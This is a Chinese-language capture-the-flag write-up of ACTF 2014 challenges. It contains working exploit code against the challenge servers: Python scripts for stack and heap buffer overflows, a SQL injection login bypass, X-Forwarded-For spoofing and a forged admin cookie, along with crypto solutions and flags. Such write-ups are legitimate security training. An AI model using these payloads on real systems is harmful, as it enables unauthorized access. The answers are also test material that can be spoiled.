REVERSE 0 RE?
說好的逆向題呢?
出題人還沒吃早飯呢,你們急什么。出門左轉,乖乖做Web題,OK不?
解題方法:
此題賣萌。“OK不?”“ OK!”
FLAG:
OK
CRYPTO 100 古老
本題flag不在ACTF{}中。
oivqmqgn, yja vibem naarn yi yxbo sqnyab yjqo q zixuea is gaqbn qdi. ykra jqn zira yi baseazy yjqy qeni ko yja ujbqzw rqdqhkoa. yjkn kn vjqy yja uquab saam kn qpixy: gix nxprky q uquab, va backav ky qom ky dayn uxpeknjam. oi oaam yi vqky q rioyj ib yvi xoyke gix naa gixb qbykzea ko yja oafy ujbqzw knnxa, vjao yja ykra jqn zira, va'ee mazkma yi zirukea q oav knnxa sbir yja qbykzean yjqy jqca paao nxprkyyam. yjqy'n pqnkzqeeg ky. qom dbqp gix seqd jaba, zbguyiiiniziieqrkbkdjy?
解題方法:
nowadays, the world seems to turn faster than a couple of years ago. time has come to reflect that also in the phraes magazine. this is what the paper feed is about: you submit a paper, we review it and it gets published. no need to wait a month or two until you see your article in the next phraes issue, when the time has come, we'll decide to compile a new issue from the articles that have been submitted. that's basically it. and grab you flag here, cryptooosocoolamiright?
FLAG:
cryptooosocoolamiright
EXPLOIT 100 餐前甜點
nc 218.2.197.236 2009
crypto200.tar.gz
下載鏈接:http://ctf.zjuisa.org/downloads/pwn100.b0aaaddb42c9569ef8a2c4b7a2c9ee18
解題方法:
用IDA打開,反編譯得到main和game函數:
1 char *__cdecl main() 2 { 3 char *result; // eax@1 4 int v1; // [sp+1Ch] [bp-84h]@1 5 int (*v2)(void); // [sp+9Ch] [bp-4h]@1 6 v2 = 0; 7 puts("== Welcome to PWWWWWWWWN world! ==\n"); 8 fflush(stdout); 9 result = gets((char *)&v1); 10 if ( v2 ) 11 { 12 puts("You are on the right way."); 13 fflush(stdout); 14 result = (char *)v2(); 15 } 16 return result; 17 } 18 19 int __cdecl game() 20 { 21 int result; // eax@3 22 FILE *stream; // [sp+1Ch] [bp-Ch]@1 23 puts("Flag, gei ni yo"); 24 stream = fopen("/home/pwn/flag.txt", "r"); 25 while ( 1 ) 26 { 27 result = fgetc(stream); 28 if ( (_BYTE)result == -1 ) 29 break; 30 putchar((char)result); 31 } 32 return result; 33 }
其中game函數可以打印出flag,函數入口為0x0804855c。
在main函數里看到可以利用gets溢出v1覆蓋v2從而執行if分支調用v2,v1長128個字符,在后面接上game的地址,注意call指令地址要倒序(栽在這上面好久。。。),用python:
1 import socket 2 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 3 sock.connect(('218.2.197.236', 2009)) 4 print sock.recv(1024) 5 sock.send('\xFF' * 128 + '\x5c\x85\x04\x08' + '\n') 6 print sock.recv(1024) 7 sock.close()
FLAG:
ACTF{This_is_an_easy_one_you_have_a_long_w4y_2_go}
MISC 100 社(song)工(fen)
聽說參加ACTF的屌絲都喜歡上貼吧:)
解題方法:
此題送分,直接在百度貼吧搜素ACTF,可以找到http://tieba.baidu.com/p/2960754182帖子,復制flag:ACTF{WEL0VECTF_SDOIFJDF}
后來有好多在ACTF發搗亂貼的誤導別人,哎~
FLAG:
ACTF{WEL0VECTF_SDOIFJDF}
WEB 100 flag之路
少年,不來一發么。http://218.2.197.236:2005/index.php
解題方法:
打開http://218.2.197.236:2005/index.php,就一句話:
Can you GET the way to flag?
查源碼:
1 <html> 2 <link rel="stylesheet" type="text/css" href="style.css"> 3 <br><br><br><br><br><br><br> 4 Can you GET the way to flag? 5 </html> 6 <!--way = "H4ck_F0r_Fun!GoGoGo!" -->
看到一句注釋way="H4ck_F0r_Fun!GoGoGo!",試一下,嗯,果然不是flag。
再看這句話,大寫GET?,必有貓膩,HTTP的GET提交方式?
試下http://218.2.197.236:2005/index.php?way=H4ck_F0r_Fun!GoGoGo!
提交后,轉到http://218.2.197.236:2005/322ad17d5b5fb56a810d9a295ffb5a8c.php
還是一句話:“flag can only access in local machine! ”,查源碼無果。只能本地訪問,首先想到反向代理,但是怎么實現呢?然后就一直卡這了。
后來根據大牛們的說法,添加HTTP請求頭X-Forwarded-For:127.0.0.1即可,重新提交,獲得flag。
1 >>> import httplib 2 >>> con=httplib.HTTPConnection('218.2.197.236',2005) 3 >>> con.request('GET','//322ad17d5b5fb56a810d9a295ffb5a8c.php','',{'X-Forwarded-For':'127.0.0.1'}) 4 >>> res=con.getresponse() 5 >>> data=res.read() 6 >>> print data 7 <link rel="stylesheet" type="text/css" href="style.css"> 8 Here is your flag: ACTF{I_love_H4ck_and_I_love_F4ck}<br><br><br><br><br><br><br><br> 9 flag can only access in local machine! 10 <br>
FLAG:
ACTF{I_love_H4ck_and_I_love_F4ck}
CRYPTO 200 買不到票的怨念
買不到TI4的門票覺得人生好灰暗。。crypto200.tar.gz
下載鏈接:http://ctf.zjuisa.org/downloads/crypto200.tar.gz.d656ad805747d212e4b49a74a0b4e8c7
解題方法:
下載下來解壓出4個文件:encryptor.py,msg01,msg01.enc,msg02.enc
msg01是一句話:Welcome to AAA capture the flag you folks
msg01.enc,msg02.enc都是亂碼
encryptor.py是個加密程序:
1 f = open('msg01', 'rb').read() 2 g = open('msg01.enc', 'wb') 3 4 key = 'key' 5 c = '' 6 t = chr(0) 7 i = 0 8 9 for p in f: 10 c = chr(( ord(p) + (ord(key[i % len(key)]) ^ ord(t)) + i**i ) & 0xff) 11 t = p 12 i += 1 13 g.write(c) 14 15 g.close()
運行一下試試,發現msg01加密結果和題給的msg01.enc不一樣,看代碼估計是密鑰key不一樣的緣故,那么下面重點就是找key了,因為已知明文msg01和密文msg01.enc,寫出下面代碼:
1 f = open('msg01', 'rb').read() 2 g = open('msg01.enc', 'rb').read() 3 k = open('key','wb') 4 5 key = '' 6 t = chr(0) 7 i = 0 8 9 for p in f: 10 key = chr((ord(g[i]) - i**i - ord(p)) & 0xff ^ ord(t)) 11 t = p 12 i +=1 13 k.write(key) 14 k.close()
運行得key:DoNotTryToGuessWhatDoesD3AdCa7ThinkOfDoNo
后面DoNo開始從頭循環了,取前面一大串:DoNotTryToGuessWhatDoesD3AdCa7ThinkOf作為最后的key,寫出解密代碼:
1 f = open('msg02', 'wb') 2 g = open('msg02.enc', 'rb').read() 3 4 key='DoNotTryToGuessWhatDoesD3AdCa7ThinkOf' 5 c = '' 6 t = chr(0) 7 i = 0 8 9 for p in g: 10 c = chr(ord(p) - i**i - (ord(key[i % len(key)]) ^ ord(t)) & 0xff) 11 t = c 12 i += 1 13 f.write(c) 14 f.close()
運行得到結果:
High demand! No matches...
Search again for these tickets (a fan may have let them go) or change quantity/ticket type.
Get This damn fl4g plz
ACTF{why_can_not_I_buy_a_TI4_ticket_It_it_so_terrible!!!!!!!!!!}
FLAG:
ACTF{why_can_not_I_buy_a_TI4_ticket_It_it_so_terrible!!!!!!!!!!}
EXPOLIT 200 殺豬吃肉
nc 218.2.197.236 2010
crypto200.tar.gz
下載鏈接:http://ctf.zjuisa.org/downloads/pwn200.676407435f65a98b11f7a3398491e04b
解題方法:
下載文件用IDA打開,發現是64位的,反編譯插件不支持,只能摳匯編了暈。。。
從main函數開始看:
1 .text:0000000000400A1A public main 2 3 .text:0000000000400A1A main: 4 5 .text:0000000000400A1A push rbp 6 7 .text:0000000000400A1B mov rbp, rsp 8 9 .text:0000000000400A1E sub rsp, 0A0h 10 11 .text:0000000000400A25 mov [rbp-94h], edi 12 13 .text:0000000000400A2B mov [rbp-0A0h], rsi 14 15 .text:0000000000400A32 mov edi, offset a_________ ; " _____ _ _ "... 16 17 .text:0000000000400A37 call _puts 18 19 .text:0000000000400A3C mov edi, offset a___ ; "/ ___|| | | | |"... 20 21 .text:0000000000400A41 call _puts 22 23 .text:0000000000400A46 mov edi, offset a______________ ; "\\ `--. | | __ _ _ _ __ _ | |__ |"... 24 25 .text:0000000000400A4B call _puts 26 27 .text:0000000000400A50 mov edi, offset a__________ ; " `--. \\| | / _` || | | | / _` || '_ \\ |"... 28 29 .text:0000000000400A55 call _puts 30 31 .text:0000000000400A5A mov edi, offset a________ ; "/\\__/ /| || (_| || |_| || (_| || | | ||"... 32 33 .text:0000000000400A5F call _puts 34 35 .text:0000000000400A64 mov edi, offset a_____________0 ; "\\____/ |_| \\__,_| \\__,_| \\__, ||_| |_| "... 36 37 .text:0000000000400A69 call _puts 38 39 .text:0000000000400A6E mov edi, offset a__ ; " __/ | "... 40 41 .text:0000000000400A73 call _puts 42 43 .text:0000000000400A78 mov edi, offset a____0 ; " |___/ "... 44 45 .text:0000000000400A7D call _puts 46 47 .text:0000000000400A82 mov rax, cs:stdout@@GLIBC_2_2_5 48 49 .text:0000000000400A89 mov rdi, rax 50 51 .text:0000000000400A8C call _fflush 52 53 .text:0000000000400A91 jmp short loc_400A94 54 55 .text:0000000000400A93 ; --------------------------------------------------------------------------- 56 57 .text:0000000000400A93 58 59 .text:0000000000400A93 loc_400A93: ; CODE XREF: .text:0000000000400BE2j 60 61 .text:0000000000400A93 ; .text:0000000000400C50j ... 62 63 .text:0000000000400A93 nop 64 65 .text:0000000000400A94 66 67 .text:0000000000400A94 loc_400A94: ; CODE XREF: .text:0000000000400A91j 68 69 .text:0000000000400A94 mov rdx, cs:service 70 71 .text:0000000000400A9B mov rax, cs:auth 72 73 .text:0000000000400AA2 mov rsi, rax 74 75 .text:0000000000400AA5 mov edi, offset aKillpigPFeedpi ; "[ killPig = %p, feedPig = %p ]\n" 76 77 .text:0000000000400AAA mov eax, 0 78 79 .text:0000000000400AAF call _printf 80 81 .text:0000000000400AB4 mov rax, cs:stdout@@GLIBC_2_2_5 82 83 .text:0000000000400ABB mov rdi, rax 84 85 .text:0000000000400ABE call _fflush 86 87 .text:0000000000400AC3 mov rdx, cs:stdin@@GLIBC_2_2_5 88 89 .text:0000000000400ACA lea rax, [rbp-90h] 90 91 .text:0000000000400AD1 mov esi, 80h 92 93 .text:0000000000400AD6 mov rdi, rax 94 95 .text:0000000000400AD9 call _fgets 96 97 .text:0000000000400ADE test rax, rax 98 99 .text:0000000000400AE1 jz loc_400C5A ; X 100 101 .text:0000000000400AE7 lea rax, [rbp-90h] 102 103 .text:0000000000400AEE mov edx, 8 104 105 .text:0000000000400AF3 mov esi, offset aKillpig ; "killPig " 106 107 .text:0000000000400AF8 mov rdi, rax 108 109 .text:0000000000400AFB call _strncmp 110 111 .text:0000000000400B00 test eax, eax 112 113 .text:0000000000400B02 jnz short loc_400B64 114 115 .text:0000000000400B04 mov edi, 8 116 117 .text:0000000000400B09 call _malloc 118 119 .text:0000000000400B0E mov cs:auth, rax 120 121 .text:0000000000400B15 mov rax, cs:auth 122 123 .text:0000000000400B1C mov edx, 8 124 125 .text:0000000000400B21 mov esi, 0 126 127 .text:0000000000400B26 mov rdi, rax 128 129 .text:0000000000400B29 call _memset 130 131 .text:0000000000400B2E lea rax, [rbp-90h] 132 133 .text:0000000000400B35 add rax, 8 134 135 .text:0000000000400B39 mov rdi, rax 136 137 .text:0000000000400B3C call _strlen 138 139 .text:0000000000400B41 cmp rax, 1Eh 140 141 .text:0000000000400B45 ja short loc_400B64 142 143 .text:0000000000400B47 mov rax, cs:auth 144 145 .text:0000000000400B4E lea rdx, [rbp-90h] 146 147 .text:0000000000400B55 add rdx, 8 148 149 .text:0000000000400B59 mov rsi, rdx 150 151 .text:0000000000400B5C mov rdi, rax 152 153 .text:0000000000400B5F call _strcpy 154 155 .text:0000000000400B64 156 157 .text:0000000000400B64 loc_400B64: ; CODE XREF: .text:0000000000400B02j 158 159 .text:0000000000400B64 ; .text:0000000000400B45j 160 161 .text:0000000000400B64 lea rax, [rbp-90h] 162 163 .text:0000000000400B6B mov edx, 5 164 165 .text:0000000000400B70 mov esi, offset aReset ; "reset" 166 167 .text:0000000000400B75 mov rdi, rax 168 169 .text:0000000000400B78 call _strncmp 170 171 .text:0000000000400B7D test eax, eax 172 173 .text:0000000000400B7F jnz short loc_400B90 174 175 .text:0000000000400B81 mov rax, cs:auth 176 177 .text:0000000000400B88 mov rdi, rax 178 179 .text:0000000000400B8B call _free 180 181 .text:0000000000400B90 182 183 .text:0000000000400B90 loc_400B90: ; CODE XREF: .text:0000000000400B7Fj 184 185 .text:0000000000400B90 lea rax, [rbp-90h] 186 187 .text:0000000000400B97 mov edx, 7 188 189 .text:0000000000400B9C mov esi, offset aFeedpig ; "feedPig" 190 191 .text:0000000000400BA1 mov rdi, rax 192 193 .text:0000000000400BA4 call _strncmp 194 195 .text:0000000000400BA9 test eax, eax 196 197 .text:0000000000400BAB jnz short loc_400BC7 198 199 .text:0000000000400BAD lea rax, [rbp-90h] 200 201 .text:0000000000400BB4 add rax, 8 202 203 .text:0000000000400BB8 mov rdi, rax 204 205 .text:0000000000400BBB call _strdup 206 207 .text:0000000000400BC0 mov cs:service, rax 208 209 .text:0000000000400BC7 210 211 .text:0000000000400BC7 loc_400BC7: ; CODE XREF: .text:0000000000400BABj 212 213 .text:0000000000400BC7 lea rax, [rbp-90h] 214 215 .text:0000000000400BCE mov edx, 5 216 217 .text:0000000000400BD3 mov esi, offset aEatit ; "eatIt" 218 219 .text:0000000000400BD8 mov rdi, rax 220 221 .text:0000000000400BDB call _strncmp 222 223 .text:0000000000400BE0 test eax, eax 224 225 .text:0000000000400BE2 jnz loc_400A93 226 227 .text:0000000000400BE8 mov rax, cs:auth 228 229 .text:0000000000400BEF mov eax, [rax+20h] 230 231 .text:0000000000400BF2 test eax, eax 232 233 .text:0000000000400BF4 jz short loc_400C37 234 235 .text:0000000000400BF6 mov edi, offset aFlagGeiNiYooo ; "Flag, gei ni yooo" 236 237 .text:0000000000400BFB call _puts 238 239 .text:0000000000400C00 mov esi, offset aR ; "r" 240 241 .text:0000000000400C05 mov edi, offset aHomePwnFlag_tx ; "/home/pwn/flag.txt" 242 243 .text:0000000000400C0A call _fopen 244 245 .text:0000000000400C0F mov [rbp-8], rax 246 247 .text:0000000000400C13 jmp short loc_400C20 248 249 .text:0000000000400C15 ; --------------------------------------------------------------------------- 250 251 .text:0000000000400C15 252 253 .text:0000000000400C15 loc_400C15: ; CODE XREF: .text:0000000000400C33j 254 255 .text:0000000000400C15 movsx eax, byte ptr [rbp-9] 256 257 .text:0000000000400C19 mov edi, eax 258 259 .text:0000000000400C1B call _putchar 260 261 .text:0000000000400C20 262 263 .text:0000000000400C20 loc_400C20: ; CODE XREF: .text:0000000000400C13j 264 265 .text:0000000000400C20 mov rax, [rbp-8] 266 267 .text:0000000000400C24 mov rdi, rax 268 269 .text:0000000000400C27 call _fgetc 270 271 .text:0000000000400C2C mov [rbp-9], al 272 273 .text:0000000000400C2F cmp byte ptr [rbp-9], 0FFh 274 275 .text:0000000000400C33 jnz short loc_400C15 276 277 .text:0000000000400C35 jmp short loc_400C55 278 279 .text:0000000000400C37 ; --------------------------------------------------------------------------- 280 281 .text:0000000000400C37 282 283 .text:0000000000400C37 loc_400C37: ; CODE XREF: .text:0000000000400BF4j 284 285 .text:0000000000400C37 mov edi, offset aWhoAreYouZhuto ; "Who are you! zhutou bu shi ni xiang chi"... 286 287 .text:0000000000400C3C call _puts 288 289 .text:0000000000400C41 mov rax, cs:stdout@@GLIBC_2_2_5 290 291 .text:0000000000400C48 mov rdi, rax 292 293 .text:0000000000400C4B call _fflush
總體邏輯是順序依次判斷輸入字符串與"killPig "(有空格)、"reset"、"feedPig"、"eatIt"是否一致並跳轉到相應的操作上。
第233行看到一個關鍵跳轉:jz short loc_400C37,需要eax不為0才能執行下面打印flag的代碼。
而eax是.bss段auth+20H開始的值,這段內存由提交"killPig "后分配並置0,再通過提交"feedPig"+過長字符串從service溢出覆蓋auth,最后提交"eatIt"打印flag:
C:\nc11nt>nc 218.2.197.236 2010 _____ _ _ _ _ / ___|| | | | | | | | \ `--. | | __ _ _ _ __ _ | |__ | |_ ___ _ __ | |__ ___ _ _ ___ ___ `--. \| | / _` || | | | / _` || '_ \ | __| / _ \| '__|| '_ \ / _ \ | | | |/ __ | / _ \ /\__/ /| || (_| || |_| || (_| || | | || |_ | __/| | | | | || (_) || |_| |\__ \| __/ \____/ |_| \__,_| \__,_| \__, ||_| |_| \__| \___||_| |_| |_| \___/ \__,_||___ / \___| __/ | |___/ [ killPig = (nil), feedPig = (nil) ] killPig [ killPig = 0x2170010, feedPig = (nil) ] feedPigaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaa [ killPig = 0x2170010, feedPig = 0x2170030 ] [ killPig = 0x2170010, feedPig = 0x2170030 ] eatIt Flag, gei ni yooo ACTF{Why_not_try_zio_to_Pwwwwwwwwwn_Everything} [ killPig = 0x2170010, feedPig = 0x2170030 ]
FLAG:
ACTF{Why_not_try_zio_to_Pwwwwwwwwwn_Everything}
WEB 200 討厭的管理員
FLAG在admin的手里!http://218.2.197.236:2005/web200/index.php
解題方法:
打開http://218.2.197.236:2005/web200/index.php是個登陸界面,標准注入:' or '1'='1
提示flag在ae6032eeeb5cedc1555940983435335b.php
打開http://218.2.197.236:2005/web200/ae6032eeeb5cedc1555940983435335b.php
一句:wrong place man! key is not here.
Are you kidding me!果然是忽悠人的。
wireshark抓原報文:
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Sun, 06 Apr 2014 14:09:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.10
realkeyisin: beda47ac34562108ee149767c61cb0ec.php
7d
<link rel="stylesheet" type="text/css" href="style.css">
<br><br><br><br><br><br><br><br>
wrong place man! key is not here.
看到有個realkeyisin:beda47ac34562108ee149767c61cb0ec.php
打開http://218.2.197.236:2005//web200/beda47ac34562108ee149767c61cb0ec.php
一句話:You find it! But only admin can see the flag...can you see it?
又是管理員什么玩意的,到這我是看不懂了,聽說加個Cookie:admin=1就行?
GET http://218.2.197.236:2005//web200/beda47ac34562108ee149767c61cb0ec.php HTTP/1.1
Host: 218.2.197.236:2005
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: admin=1
這題純屬看緣分。
1 >>> import httplib 2 >>> con=httplib.HTTPConnection('218.2.197.236',2005) 3 >>> con.request('GET','/web200/beda47ac34562108ee149767c61cb0ec.php','',{'Cookie':'admin=1'}) 4 >>> res=con.getresponse() 5 >>> data=res.read() 6 >>> print data 7 <link rel="stylesheet" type="text/css" href="style.css"> 8 9 <br><br><br><br><br><br><br><br> 10 11 You find it! But only admin can see the flag...can you see it?<br> 12 13 flag:ACTF{I_donot_need_sex_life_fxxks_me_everyday} 14 >>>
FLAG:
ACTF{I_donot_need_sex_life_fxxks_me_everyday}
好了,我這水平也就能做做100、200的題,下面就坐等大神們的write up了。
MISC 300 S4ndb0x
http://218.2.197.236:2015
MISC 300 抓(zhua)包(zhu)
豬頭在自習室用手機的流量被全部抓到了!看看流量里有什么有意思的東西?
鏈接:http://pan.baidu.com/s/1ntrzThB 密碼:cbf2
MISC 300 找(ri)bug(豬)
豬頭喜歡上oschina,找死貓要了一個安卓客戶端,不過死貓居心叵測在里面留了一個后門。聽說豬頭在oschina用私信約了一個妹妹,現在給你一個種馬的機會,看能不能把豬頭約炮的私信偷出來?當然要繞過殺毒哦。
http://218.2.197.236:2007
WEB 300 喵喵喵喵
管理員小陸搭了個服務器,但是好像漏洞蠻多喲。
http://218.2.197.236:2001/index.html
CRYPTO 400 老大哥aay的秘密
老大哥aay給了你一個神秘文件,你看着辦吧flag.rar
下載鏈接:http://ctf.zjuisa.org/downloads/flag.rar.f4cc03f0637d6ac68e5fa230a65a4071
MISC 400 贊助商
你大家快來看贊助商!hidden.png
下載鏈接:http://ctf.zjuisa.org/downloads/hidden.png.dc1ae8d8f43c52dd53cce50b7b253593
WEB 400 貢丸醬
web300沒做出來的話這題做出來的希望不大,你以為你是可愛的貢丸醬么( つ•�ω•�)つ
(貢丸醬到底算不算提示呢)
(web300和web400都不需要使用掃描器)
(本題flag並不是ACTF形式的,你提交的flag中也不需要包含任何形式的括號)
http://218.2.197.236:2003
提示
現在可以公開的情報:
管理員是個很懶的人,他的筆記幾乎沒有任何廢話。
WEB 500 喪心病狂的黑客
管理員小陸搭的服務器被人日穿了(見web300),小陸被boss罵了個狗血淋頭。然后boss勒令小陸再搭一遍,小陸在某內網換了個架構(原架構是nginx)又搭了一遍web300的站,修補了部分漏洞。boss和小陸都是那台服務器的用戶,這樣boss發現小陸又寫出漏洞代碼就會及時記錄在服務器上。
接受挑戰,hackers,日穿這台位置未知的內網服務器!!!
(本題和之前的web題有緊密聯系!!!)
(部分關鍵文件每十分鍾重置一次!!!)
(本題flag不包含有ACTF字樣,不包含有任何括號!!!)
(Drink All The Booze , Hack All The Things!!!)
提示
第一步先確定服務器位置
REVERSE 800 Chaos
Download: http://pan.baidu.com/s/1i3GA4zr
Password: ophk
ATQA (SENS_RES): 00 04
UID (NFCID1): AD EA DC A7
SAK (SEL_RES): 08
請你幫這只死貓計算出 0 扇區的 KeyA 和 3 扇區的 KeyB
Flag = ( Sector_0_KeyA + Sector_3_KeyB ).encode('hex').upper()
提示
exported and non-exported entries can ease your life
Log => Code Path, Google => Document, Server => Secret, Reuse => No More Reverse
REVERSE 800 NonStandard
鏈接: http://pan.baidu.com/s/1pJO5QeZ 密碼: lk1d
寫不出 Keygen 都不好意思說自己是搞逆向的
請寫出 Keygen 發送至 ACTF.NonStandard@gmail.com,解決“暗樁”有額外加分
提示
看標題
REVERSE 800 Verify
鏈接: http://pan.baidu.com/s/1GOO3c 密碼: 6q9f
提示
RTFM
Over